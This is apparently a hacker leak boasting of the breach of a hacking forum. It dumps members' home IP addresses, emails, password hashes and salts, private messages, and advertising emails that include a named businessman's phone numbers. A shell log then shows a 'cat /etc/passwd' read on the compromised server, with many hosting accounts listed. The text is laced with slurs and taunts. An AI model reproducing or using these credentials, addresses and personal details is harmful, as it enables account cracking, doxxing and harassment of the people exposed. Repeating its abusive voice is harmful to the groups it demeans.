Greatfox  -------My Home IP-------> 89.181.20.131 
edu19     -------My Home IP-------> 201.64.54.4 
Edu19     -------My Home IP-------> 200.210.190.73 
Cj        -------My Home IP-------> 189.177.26.200 

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED                      HASHES FOR HAX                        BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

USERNAME          EMAIL                            HASH                              SALT

ADMINS:

Edu19             edubp2002@hotmail.com            f3cc355f704d139190be812610a8a041  sO:/E
r0rkty            0x803A@gmail.com                 8c8d6d6d464fe61e54e5e1d98f8344e0  (Y<CS

VIPS:

sarkar112         sarkar112@gmail.com              95a100ce5b0cca3f7ab4f6d822b9c839  G;J5I
Cephexin          cephexin@gmail.com               9baa1127d60dc4f84be96905538d4483  d@RNc
syncorion         c853@hotmail.com                 c2bd3225c9e520f0bd0d18bb7ac7df72  eiZ:^
Glyph             Glyphster@gmail.com              8743c2434c66f3a0f4c6bdace7fdebf7  B>Wi.
jplopezy          jplopezy@gmail.com               1595a492c5e4bbffab6c80efb27cd382  yrRat
DiabloHorn        diablohorn@gmail.com             d6e90ceb40ca996bd9c2921ed3eb90d3  E"-ws

SYSOPS:

FLX                 flxfxp@gmail.com               0caf3462d30982bb4f96eb1ce9ba7341  #q@UT
cyph3r              system_admin@nym.hush.com      e30d288629fab87cb44d60aedbd2498c  _@^).
webdevil            w3bd3vil@gmail.com             8122d51c66cddc7fb648c1050e5e4647  _SH$Z
ParanoidE           ne0.sn1ff3r@gmail.com          73b0fcd9093359a5de622b7fabf1ba8a  hEOX*
greatfox            artur.g.ferreira@gmail.com     f00143b97acff2cf4a5f73c90ef36522  5>3:#

RETIRED AKA RM'ED:

Aelphaeis_Mangarae  blackhatforums@gmail.com       0549158dc7a821ce1c6c1721f004e151  c},5#
Cj                  bl4ckb0x@live.com              1de22a783821962397460e6b4a2f8850  $p')x
RoMeO               romeo.haxxor@gmail.com         0fb82d94184aca290e633cf50671baf9  R_g^0
sykadul             sykadul@astalavista.com        ea0518ba567418a4e90e7101bcd0fec5  )(uf(

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED                  Aelphaeis_Mangarae PM's                   BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

For one, all this guy does is beg for 0dayz, and requires people pay for access to the OTO
secret hacking group that never developed anything:

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

--

I was wondering if you would post that login (SQL Injection) that you gave me.<br />
<br />
That's pretty interesting, others will probably want to have a look.

--

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

--

Sorry, it is tempting.<br />
<br />
The only way I would ever let anyone in through monetary donations, is if the donation as 
substantial (large.)

--

At least $100 US.<br />
<br />
And remembering of course, if I suspect you leaking ANYTHING from the OTO and find the tin
iest piece of evidence, you would be kicked out.<br />
<br />
You wouldn't even be allowed to hint to other people that stuff that is in there.<br />
<br />
There isn't ALOT of stuff in there atm, but in the coming months I bet there will be.

--

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

Also he only cares about money.  First we will talk about Aelphaeis_Mangarae's greed.

Let's check out his private messagez:

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

--

I accept your very generous offer.<br />
<br />
Thank You<br />
<br />
- Aelphaeis Mangarae

--

Just donate either $10US or $20 US.<br />
<br />
I can give you my paypal account (only method I am able to accept $$$.)

--

$20 US should be enough (bandwidth costs are increasing though..)<br />
<br />
I would be most than happy with $20 US, even if you can donate $10 US.<br />
<br />
I can only accept money via paypal though, is that a problem?

--

My paypal is: [code]adam_we1shaupt@hotmail.com[/code]

--

Well my paypal account is: [code]adam_we1shaupt@hotmail.com[/code]

--

My paypal is: [code]adam_we1shaupt@hotmail.com[/code]

--

Thanks for your donation.<br />
<br />
I won't comment on anything else (sorry.)<br />
<br />
I will try and pay you back sometime in the future, some how.<br />
<br />
- Aelphaeis Mangarae

--

There is no way you could paypal me the money?

--

Your not able to via paypal? (For donations.)

--

Well my paypal account is: adam_we1shaupt@hotmail.com<br />
<br />
Research paper..? Anything I might be interested in reading?

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED        Aelphaeis_Mangarae GREEDY MAIL SPO0lZ               BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

------=_Part_8917_6415726.1230342925719
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi, well we'd like to get the word out, so can you give us an option for
having out banner ad visible by all BHF users, maybe we can start with a
$200 or $300 purchase, to see how it works for us? I'm assuming it will work
great and we'll want to go big shortly thereafter.
Thx, JP

JP LaMere
USA: 612-605-4706
info@iprental.com  www.iprental.com


On Fri, Dec 26, 2008 at 4:48 PM, <admin@blackhat-forums.com> wrote:

> Hi, the prices varies depending on the campaign type and ads size, and are
> negotiable, please send us some more details about your campaign
>
> BHF Administration
>
> On Sun, 21 Dec 2008 14:21:19 -0800, "Customer Service" <info@iprental.com>
> wrote:
>  > Hi, this is JP with IPRental.com, we're interested in running banner
> ads
> on
> > your site, can you pls direct me to pricing and other details?
> >
> > Thx! JP
> >
> > --
> > JP LaMere
> > USA: 612-605-4706
> > info@iprental.com  www.iprental.com
>
>

------=_Part_8917_6415726.1230342925719
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

------=_Part_34240_28179284.1230590972627
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi, ok we'd like to get a price on doing the PM to all users of
Blackhat-Forums.com, I think that would be a great way to start, then we'll
do the banners and all that shortly after, so can you pls get us a price?

Also, I got my iprental account banned by doing my first post in the wrong
place, promoting IPRental shamelessly, can you unblock me?

Thanks! JP

JP LaMere
USA: 612-605-4706
info@iprental.com  www.iprental.com


On Sun, Dec 28, 2008 at 5:43 AM, <admin@blackhat-forums.com> wrote:

> Greetings.
>
> We can offer you many different advertisement methods such as:
> - Placement of banners on a position you choose (Examples such as: Top,
> left side, right side, Right below first post of a topic, personal
> signature of at least 1 admin, and all other position by negotiation).
> - We can also do a "recommendation topic" and pin it, by the admin, send
> mass PM's to all members recommending your site, etc.
>
> The possibilites are infinite. Suggest the exact positions you wish and
> we will analyze.
> Just let us know the exact kind of advertisement you want, and the
> position, and we negotiate the prices.
>
> BHF Administration

------=_Part_71873_3914557.1230841885257
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi, I like the idea of the mass PM to all members, how many total members
are there? We're just getting going, and as you can imagine have a ton of
expenses right now, so how much wiggle room do you have on the $600 price? I
know I can do $400 right now, but $600 we'll have to wait a while, so pls
let me know.

Thx, JP

JP LaMere
USA: 612-605-4706
info@iprental.com  www.iprental.com


On Thu, Jan 1, 2009 at 10:47 AM, <admin@blackhat-forums.com> wrote:

> Greetings.
>
> We offer several positions for placing ads, the most used are:
>
> On Portal:
>
>        Portal Top: 250 USD/month
>        Portal Left Side: 250 USD/month
>        Portal below the "IRC" & "Forum" Image Links: 200 USD/month
>        Portal Special Box on the right: 190 USD/month
>        Portal Other (other position you may wish by negotiation)
>
> Forum Index:
>
>        Forum Top 350 USD/month
>        Forum Below Login/Register Bar: 350 USD/month
>        Forum Bottom: 100 USD/month
>        Forum Other (other position you may wish by negotiation)
>
> Topic View:
>
>        Below the first post of a Topic: 300 USD/month
>
> Other advertisement methods:
>
> Mass Pm All users with a personal recommendation to the product by the
> admin: 600 USD
>
> Pinned Recommendation Post to the product by an admin: 300 USD
>
> Note: The prices are up to negotiation.
>
> BHF Administration

User-Agent: RoundCube Webmail/0.2
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset="UTF-8"

Greetings,

Yes, would be a matter of telling us what message do you want. And we will
send after a PayPal payment to "0x803a@gmail.com" of $300.

BHF Administration

PD: Send an email to "0x803a@gmail.com" regarding to your question if it
would be only once or more than once.

On Thu, 26 Mar 2009 13:46:42 -0500, Customer Service IPRental
<info@iprental.com> wrote:
> Hi, that's great news, yes we are interested. So this would be a PM you
> send
> out to all current users of BlackHatForum, one time or more than once,
for
> $300?
> 
> Also, I got banned from the forum yesterday for responding to a post from
a
> person looking for an IP solution,  I didn't know any better and just
> mentioned shamelessly they should use IPRental. I'm not an experienced
> forum
> user and didn't realize I was doing something bad, can you re-instate me
> and
> I will not do that again?
> 
> Thx, JP
> 
> JP LaMere
> USA: 612-419-1322
> info@iprental.com  www.iprental.com
> 
> 


Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset="UTF-8"

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

AHAHAHAHAH THE GUY TRYING TO BUY ADS ON BHF GOT SOCIALED FOR THE PREMIUM SECTION HAHAHAHAH

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

Greetings,

To who you did pay $97 to become Premium Member? There's no such thing as
Premium Member and it is NOT paid. Paypal to this e-mail
"0x803a@gmail.com".

//BHF Administration

On Fri, 22 May 2009 16:56:08 -0700, Customer Service IPRental
<info@iprental.com> wrote:
> Hi, yes we would like to take you up on your great offer to do the mass
PM
> to all your members for the $300.  We just paid the $97 to become a
Premium
> member of your site, let's get this going asap, please just let me know
> when
> to pay and where to send the message.
> Thx! JP
> 
> JP LaMere
> USA: 612-419-1322
> info@iprental.com  www.iprental.com

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED            r0rkty + RoMeO = Bl4ckH4t LUVINZ                BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

The best imageshak hacker on the planet has a great blackhat community over at darkmindz
Oh wait, they got ownedandrmed too.  So much retardation with these kids.  They talk like
their websites are little countries with troops and affiliations and shit, so lulz.
Whats really funny is that RoMeO owned astalavista and dropped all their shit under the 
"anti-sec" name when really he was one of the admins.  Talk about a sellout faggot.  Don't
try to say that you were trying to "get in and get trusted" in order to do that one lame 
ass hack so read the diplomacy between these two faggots:

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

--

Hello, you should have spoken to me in first instance. Im away on vacations, 
i will add your site when im back.<br />
<br />
Ch33rz /r0rkty.<br />
<br />
<br />
[quote]Hello there,<br />
<br />
I spoke to Aelphaeis_Mangarae weeks ago, about link exchange with my site 
its fully codded by me, up since 1.5 years, and a great community I cant be more proud of 
<br />
He agreed, but I never heared from him after that :|.<br />
<br />
so can you check whats going on, thanks and have a good day.[/quote]

--

Hey, can you give me the url and image you want on affiliates box ?

--

Took long, but its finally on the frontpage, im also glad with the affiliation you 
performed with astalavista. i am the management director there, if you need anything let 
me know.<br />
<br />
[quote][quote]Hey, can you give me the url and image you want on affiliates box ?[/quote]
<br />
<br />
Hey, <br />
<br />
Here you go, [url="http://www.darkmindz.com/link.dmz"]http://www.darkmindz.com/link.dmz[/u
rl], you can pick the one you find best. and URL is: [url="http://www.darkmindz.com"]http:
//www.darkmindz.com[/url]<br />
<br />
thanks, and hope you had a great vacation.[/quote]

--

which way are you using to contact him ? what kind of affiliation do you pretend?<br />
<br />
[quote][quote]Took long, but its finally on the frontpage, im also glad with the affiliati
on you performed with astalavista. i am the management director there, if you need anythin
g let me know.<br />
<br />
[quote][quote]Hey, can you give me the url and image you want on affiliates box ?[/quote]<
br />
<br />
Hey, <br />
<br />
Here you go, [url="http://www.darkmindz.com/link.dmz"]http://www.darkmindz.com/link.dmz[/u
rl],you can pick the one you find best. and URL is: [url="http://www.darkmindz.com"]http:/
/www.darkmindz.com[/url]<br />
<br />
thanks, and hope you had a great vacation.[/quote][/quote]<br />
<br />
Hey,<br />
<br />
thanks man, appreciated <br />
<br />
and yea, talking now to commander on how we can make it an even better affiliation.<br />
<br />
have a good day and keep up the good work&#33;[/quote]

--

what kind of content did he asked to have? Well its pretty difficult for us to place your 
site on the frontpage in a defenitive way. as your site is low traff.

--

Awesome, i will let you finish your negotiation with my partner  You have any kind of IM ?
<br />
<br />
[quote][quote]what kind of content did he asked to have? Well its pretty difficult for us 
to place your site on the frontpage in a defenitive way. as your site is low traff.[/quote
]<br />
<br />
I know my site is low traffic, not very low tho, well when compared with here I guess its 
low but it is growing.<br />
<br />
I just emailed him back for more details, waiting for a reply..<br />
<br />
we can work something out too, maybe add a banner if you like, or if you have anything in 
mind let me know..<br />
<br />
but I do have an increasing traffic on a daily basis, so hopefully I wil hit the high traf
fic category soon . working on the site daily.[/quote]

BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMED       We PWNd uR box and w3 didn't Ev3n use a tr0jan       BHFOWNEDANDRMED
BHFOWNEDANDRMED                                                            BHFOWNEDANDRMED
BHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMEDBHFOWNEDANDRMED

BEGIN DA H4XLOG NIGGA!!!!!!!!!!!!!!

Sliced and diced it as we went

bhf@blackhat-forums.com [/home/bhf/]# cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/b
in/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/b
in/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin
/noshell
rvadmin:x:32007:32009::/home/rvadmin:/usr/local/cpanel/bin/noshell
securervskin:x:32008:32010::/home/rvadmin:/sbin/nologin
secure:x:32009:32011::/home/secure:/usr/local/cpanel/bin/jailshell
aamoror:x:32011:32013::/home/aamoror:/usr/local/cpanel/bin/noshell
adgroupu:x:32012:32014::/home/adgroupu:/bin/bash
admin:x:32013:32015::/home/admin:/usr/local/cpanel/bin/noshell
alternat:x:32020:32022::/home/alternat:/usr/local/cpanel/bin/noshell
animerx:x:32024:32026::/home/animerx:/usr/local/cpanel/bin/noshell
avisale:x:32026:32028::/home/avisale:/usr/local/cpanel/bin/noshell
bal:x:32027:32029::/home/bal:/usr/local/cpanel/bin/jailshell
bfstudio:x:32029:32031::/home/bfstudio:/usr/local/cpanel/bin/noshell
bhf:x:32030:32032::/home/bhf:/usr/local/cpanel/bin/jailshell
blakecon:x:32032:32034::/home/blakecon:/usr/local/cpanel/bin/noshell
bodie:x:32033:32035::/home/bodie:/usr/local/cpanel/bin/noshell
boonehou:x:32035:32037::/home/boonehou:/usr/local/cpanel/bin/noshell
brcvideo:x:32036:32038::/home/brcvideo:/usr/local/cpanel/bin/noshell
breadand:x:32037:32039::/home/breadand:/usr/local/cpanel/bin/noshell
calacapr:x:32040:32042::/home/calacapr:/usr/local/cpanel/bin/noshell
carmelac:x:32042:32044::/home/carmelac:/usr/local/cpanel/bin/noshell
cbavenez:x:32043:32045::/home/cbavenez:/usr/local/cpanel/bin/noshell
centrora:x:32044:32046::/home/centrora:/usr/local/cpanel/bin/noshell
charlesb:x:32045:32047::/home/charlesb:/usr/local/cpanel/bin/noshell
chimp:x:32048:32050::/home/chimp:/usr/local/cpanel/bin/noshell
chimpout:x:32049:32051::/home/chimpout:/usr/local/cpanel/bin/noshell
clahorg:x:32050:32052::/home/clahorg:/usr/local/cpanel/bin/noshell
davidg:x:32057:32059::/home/davidg:/usr/local/cpanel/bin/noshell
demo:x:32059:32061::/home/demo:/usr/local/cpanel/bin/noshell
dlbox:x:32062:32064::/home/dlbox:/usr/local/cpanel/bin/noshell
eculan:x:32065:32067::/home/eculan:/usr/local/cpanel/bin/noshell
eugenioh:x:32067:32069::/home/eugenioh:/usr/local/cpanel/bin/noshell
every:x:32068:32070::/home/every:/usr/local/cpanel/bin/jailshell
exan:x:32069:32071::/home/exan:/usr/local/cpanel/bin/noshell
falcss:x:32071:32073::/home/falcss:/usr/local/cpanel/bin/noshell
falkyou:x:32072:32074::/home/falkyou:/usr/local/cpanel/bin/noshell
fastrak:x:32073:32075::/home/fastrak:/usr/local/cpanel/bin/noshell
felosi:x:32076:32078::/home/felosi:/usr/local/cpanel/bin/jailshell
gamepic:x:32079:32081::/home/gamepic:/usr/local/cpanel/bin/noshell
gastrono:x:32080:32082::/home/gastrono:/bin/false
gblank:x:32081:32083::/home/gblank:/usr/local/cpanel/bin/noshell
ghi10000:x:32083:32085::/home/ghi10000:/usr/local/cpanel/bin/noshell
giaoxu:x:32084:32086::/home/giaoxu:/usr/local/cpanel/bin/jailshell
gibsrus:x:32085:32087::/home/gibsrus:/usr/local/cpanel/bin/noshell
gio:x:32088:32090::/home/gio:/usr/local/cpanel/bin/noshell
glory:x:32089:32091::/home/glory:/usr/local/cpanel/bin/noshell
grandorg:x:32091:32093::/home/grandorg:/usr/local/cpanel/bin/noshell
grandw:x:32092:32094::/home/grandw:/usr/local/cpanel/bin/noshell
guilds:x:32095:32097::/home/guilds:/usr/local/cpanel/bin/noshell
gzaggor:x:32096:32098::/home/gzaggor:/usr/local/cpanel/bin/noshell
hhound:x:32100:32102::/home/hhound:/usr/local/cpanel/bin/jailshell
ias:x:32102:32104::/home/ias:/usr/local/cpanel/bin/noshell
imagespr:x:32103:32105::/home/imagespr:/usr/local/cpanel/bin/jailshell
immolon:x:32104:32106::/home/immolon:/usr/local/cpanel/bin/jailshell
invite:x:32105:32107::/home/invite:/usr/local/cpanel/bin/jailshell
inviteho:x:32106:32108::/home/inviteho:/usr/local/cpanel/bin/noshell
josom:x:32108:32110::/home/josom:/usr/local/cpanel/bin/noshell
juicy:x:32109:32111::/home/juicy:/usr/local/cpanel/bin/noshell
kikes:x:32112:32114::/home/kikes:/usr/local/cpanel/bin/jailshell
latrinej:x:32116:32118::/home/latrinej:/usr/local/cpanel/bin/noshell
livefree:x:32120:32122::/home/livefree:/usr/local/cpanel/bin/noshell
lokoartz:x:32123:32125::/home/lokoartz:/usr/local/cpanel/bin/noshell
media:x:32124:32126::/home/media:/usr/local/cpanel/bin/noshell
medigy:x:32125:32127::/home/medigy:/usr/local/cpanel/bin/noshell
nemsc:x:32129:32131::/home/nemsc:/bin/false
netfire:x:32130:32132::/home/netfire:/usr/local/cpanel/bin/jailshell
nitacy:x:32132:32134::/home/nitacy:/usr/local/cpanel/bin/noshell
nnomyor:x:32133:32135::/home/nnomyor:/usr/local/cpanel/bin/noshell
nolimitz:x:32134:32136::/home/nolimitz:/usr/local/cpanel/bin/noshell
northern:x:32135:32137::/home/northern:/usr/local/cpanel/bin/noshell
northsrv:x:32136:32138::/home/northsrv:/bin/false
nuisance:x:32137:32139::/home/nuisance:/bin/bash
oliwal:x:32138:32140::/home/oliwal:/usr/local/cpanel/bin/noshell
optix:x:32140:32142::/home/optix:/usr/local/cpanel/bin/jailshell
pablobay:x:32142:32144::/home/pablobay:/usr/local/cpanel/bin/noshell
paulachr:x:32144:32146::/home/paulachr:/usr/local/cpanel/bin/noshell
pedropar:x:32146:32148::/home/pedropar:/usr/local/cpanel/bin/noshell
piper:x:32150:32152::/home/piper:/usr/local/cpanel/bin/noshell
psa:x:32152:32154::/home/psa:/usr/local/cpanel/bin/jailshell
pussycom:x:32153:32155::/home/pussycom:/usr/local/cpanel/bin/noshell
qatarsuc:x:32154:32156::/home/qatarsuc:/usr/local/cpanel/bin/noshell
rcwong:x:32157:32159::/home/rcwong:/usr/local/cpanel/bin/noshell
rok:x:32160:32162::/home/rok:/usr/local/cpanel/bin/noshell
rollhack:x:32161:32163::/home/rollhack:/usr/local/cpanel/bin/noshell
rvhigh:x:32164:32166::/home/rvhigh:/usr/local/cpanel/bin/noshell
sangeler:x:32165:32167::/home/sangeler:/usr/local/cpanel/bin/noshell
schwiete:x:32167:32169::/home/schwiete:/usr/local/cpanel/bin/jailshell
sgc:x:32169:32171::/home/sgc:/usr/local/cpanel/bin/noshell
shell:x:32170:32172::/home/shell:/usr/local/cpanel/bin/jailshell
sid:x:32171:32173::/home/sid:/usr/local/cpanel/bin/noshell
skull:x:32172:32174::/home/skull:/usr/local/cpanel/bin/noshell
skullzcl:x:32173:32175::/home/skullzcl:/usr/local/cpanel/bin/noshell
slowcraf:x:32174:32176::/home/slowcraf:/usr/local/cpanel/bin/noshell
smjw:x:32175:32177::/home/smjw:/usr/local/cpanel/bin/jailshell
speed:x:32176:32178::/home/speed:/usr/local/cpanel/bin/jailshell
stole1:x:32177:32179::/home/stole1:/usr/local/cpanel/bin/noshell
stole2:x:32178:32180::/home/stole2:/usr/local/cpanel/bin/noshell
tatvnco:x:32187:32189::/home/tatvnco:/usr/local/cpanel/bin/jailshell
thecunt:x:32190:32192::/home/thecunt:/usr/local/cpanel/bin/noshell
thecunt2:x:32191:32193::/home/thecunt2:/bin/false
thegenes:x:32192:32194::/home/thegenes:/usr/local/cpanel/bin/noshell
thehomei:x:32193:32195::/home/thehomei:/usr/local/cpanel/bin/noshell
thirteen:x:32194:32196::/home/thirteen:/usr/local/cpanel/bin/noshell
thoiaotr:x:32195:32197::/home/thoiaotr:/usr/local/cpanel/bin/jailshell
tht:x:32196:32198::/home/tht:/usr/local/cpanel/bin/noshell
tijuanag:x:32197:32199::/home/tijuanag:/usr/local/cpanel/bin/noshell
timf:x:32198:32200::/home/timf:/usr/local/cpanel/bin/noshell
totalorg:x:32201:32203::/home/totalorg:/usr/local/cpanel/bin/noshell
tweedles:x:32202:32204::/home/tweedles:/usr/local/cpanel/bin/noshell
vn411:x:32207:32209::/home/vn411:/usr/local/cpanel/bin/jailshell
vozalta:x:32209:32211::/home/vozalta:/usr/local/cpanel/bin/noshell
waliber:x:32210:32212::/home/waliber:/usr/local/cpanel/bin/noshell
walkowia:x:32211:32213::/home/walkowia:/usr/local/cpanel/bin/noshell
wowtest:x:32214:32216::/home/wowtest:/usr/local/cpanel/bin/noshell
xtreme:x:32217:32219::/home/xtreme:/usr/local/cpanel/bin/noshell
xtremeim:x:32218:32220::/home/xtremeim:/usr/local/cpanel/bin/noshell
steelerp:x:32221:32223::/home/steelerp:/usr/local/cpanel/bin/noshell
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
joke:x:32225:32227::/home/joke:/usr/local/cpanel/bin/jailshell
anastas:x:32226:32228::/home/anastas:/usr/local/cpanel/bin/noshell
pilihanr:x:32229:32231::/home/pilihanr:/usr/local/cpanel/bin/jailshell
boylan:x:32230:32232::/home/boylan:/usr/local/cpanel/bin/noshell
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
clanexe:x:32234:32236::/home/clanexe:/usr/local/cpanel/bin/noshell
thechart:x:32239:32241::/home/thechart:/usr/local/cpanel/bin/noshell
dmgrafix:x:32243:32245::/home/dmgrafix:/usr/local/cpanel/bin/jailshell
startup:x:32251:32253::/home/startup:/usr/local/cpanel/bin/jailshell
clamav:x:32010:32012::/usr/local/clamav:/bin/false
helz0ne:x:32258:32260::/home/helz0ne:/usr/local/cpanel/bin/jailshell
teamblam:x:32259:32261::/home/teamblam:/usr/local/cpanel/bin/noshell
thegyg:x:32261:32263::/home/thegyg:/usr/local/cpanel/bin/noshell
infuse:x:32262:32264::/home/infuse:/usr/local/cpanel/bin/noshell
caminoen:x:32264:32266::/home/caminoen:/usr/local/cpanel/bin/noshell
yeskunic:x:32266:32268::/home/yeskunic:/usr/local/cpanel/bin/jailshell
spotpetc:x:32268:32270::/home/spotpetc:/usr/local/cpanel/bin/jailshell
stags:x:32273:32275::/home/stags:/usr/local/cpanel/bin/noshell
thecolle:x:32274:32276::/home/thecolle:/usr/local/cpanel/bin/noshell
quickpos:x:32276:32278::/home/quickpos:/usr/local/cpanel/bin/noshell
brian:x:32277:32279::/home/brian:/usr/local/cpanel/bin/noshell
cnation:x:32280:32282::/home/cnation:/usr/local/cpanel/bin/noshell
pittsche:x:32283:32285::/home/pittsche:/usr/local/cpanel/bin/noshell
stockegg:x:32285:32287::/home/stockegg:/usr/local/cpanel/bin/jailshell
hangar7:x:32286:32288::/home/hangar7:/usr/local/cpanel/bin/noshell
digital:x:32287:32289::/home/digital:/usr/local/cpanel/bin/noshell
